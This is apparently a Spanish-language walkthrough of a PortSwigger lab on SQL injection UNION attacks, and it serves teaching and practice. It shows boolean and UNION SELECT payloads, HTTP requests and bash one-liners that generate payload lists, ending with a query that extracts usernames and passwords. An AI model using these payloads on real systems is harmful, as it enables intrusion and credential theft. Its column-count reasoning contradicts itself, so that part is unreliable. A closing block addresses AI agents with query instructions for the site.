# Lab: SQL injection UNION attack, retrieving data from other tables ## Información del laboratorio En este laboratorio hay una vulnerabilidad de inyección SQL en el filtro de la categoría del producto. Esta vulnerabilidad es similar a las de los laboratorios: * [Lab: SQL injection UNION attack, determining the number of columns returned by the query](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query.md) * [Lab: SQL injection UNION attack, finding a column containing text](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-finding-a-column-containing-text.md) ## Flujo de explotación ### Identificación del parámetro vulnerable Para verificar que es vulnerable, se usan payloads con el operador lógico AND, por ejemplo: `'and'1337'='1337` y `'and'1337'='1338`. Como se puede observar, al enviar el payload 'and'1337'='1337, la condición se cumple, y por lo tanto, se obtienen los mismos datos que sin haber modificado la consulta:

GET /filter?category=Pets'and'1337'='1337 HTTP/2
Host: 0a10009104047ab8805d535300bf009f.web-security-academy.net
Cookie: session=atfLz50C4MZBqIcGa0rBRtUh4dMO1ppk
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Referer: https://0a10009104047ab8805d535300bf009f.web-security-academy.net/filter?category=Pets

En cambio al inyectar el payload `'and'1337'='1338`, la condición no se cumple, y por lo tanto, no se obtiene información: {% code overflow="wrap" %} ```http GET /filter?category=Pets'and'1337'='1338 HTTP/2 Host: 0a10009104047ab8805d535300bf009f.web-security-academy.net Cookie: session=atfLz50C4MZBqIcGa0rBRtUh4dMO1ppk User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Referer: https://0a10009104047ab8805d535300bf009f.web-security-academy.net/filter?category=Pets ``` {% endcode %}

### Obtener el número de columnas de la tabla Para poder extraer información de la base de datos, antes hay que conocer el número de columnas y luego será necesario insertar los datos de salida coincidentes con el tipo de dato de su columna respectiva. Se puede realizar de forma manual enviando el payload hasta obtener un error o se puede automatizar con intruder: 1. Añadir el punto de inserción del payload en la petición:

2. Generar la lista de payloads e pegarla en intruder: ```bash for i in {1..20}; do echo "' ORDER BY "$i"--"; done ```

3. Ejecutar el ataque y analizar la respuesta. Como se puede observar, a partir de la columna 4 genera un error en la base de datos, por lo tanto, el **número de columnas** de la tabla será **2**.

### Obtener las columnas que pueden contener texto Para ello, se tendría que generar la lista de payloads de acuerdo al número de columnas (3) obtenido en el laboratorio anterior [Inyección SQL](/pentesting-en-aplicaciones-web/general/ataques-y-vulnerabilidades/inyeccion/inyeccion-sql.md#como-identificar-las-columnas-que-permiten-insertar-texto-en-una-inyeccion-sql-union). Con este script de bash oneliner se puede obtener la lista de payloads en base al número de columnas (cols) que tiene la tabla de la consulta SQL manipulada: {% code overflow="wrap" %} ```bash cols=2; for i in $(seq 1 $cols); do echo "' UNION SELECT $(for j in $(seq 1 $cols); do [ $j -eq $i ] && echo -n "'a'" || echo -n "NULL"; [ $j -lt $cols ] && echo -n ","; done)--"; done ``` {% endcode %} Esta lista, se inserta en intruder, de la misma forma que en el laboratorio anterior. Al ejecutar el ataque, se puede observar cómo los campos que permiten la inserción de texto, responden con el código 200 y también se observa una diferencia en el tamaño de la respuesta:

Esto quiere decir, que la **columna 1 y 2** permiten insertar texto. Esto se puede observar también desde la aplicación, observando la cadena inyectada unida al resto de información de la tabla:

Sabiendo previamente que existen las columnas username y password en la tabla users: ```sql '+UNION+SELECT+username,password+FROM+users-- ``` {% code overflow="wrap" %} ```http GET /filter?category=Pets'+UNION+SELECT+username,password+FROM+users-- HTTP/2 Host: 0ad60060030431af84258b3200520086.web-security-academy.net Cookie: session=NuTYIdPa9yJhzMnIf7wqobC800f5pqmM User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Referer: https://0ad60060030431af84258b3200520086.web-security-academy.net/filter?category=Pets ``` {% endcode %} En la salida se obtienen los usuarios y sus contraseñas:

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.xtormin.com/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-data-from-other-tables.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.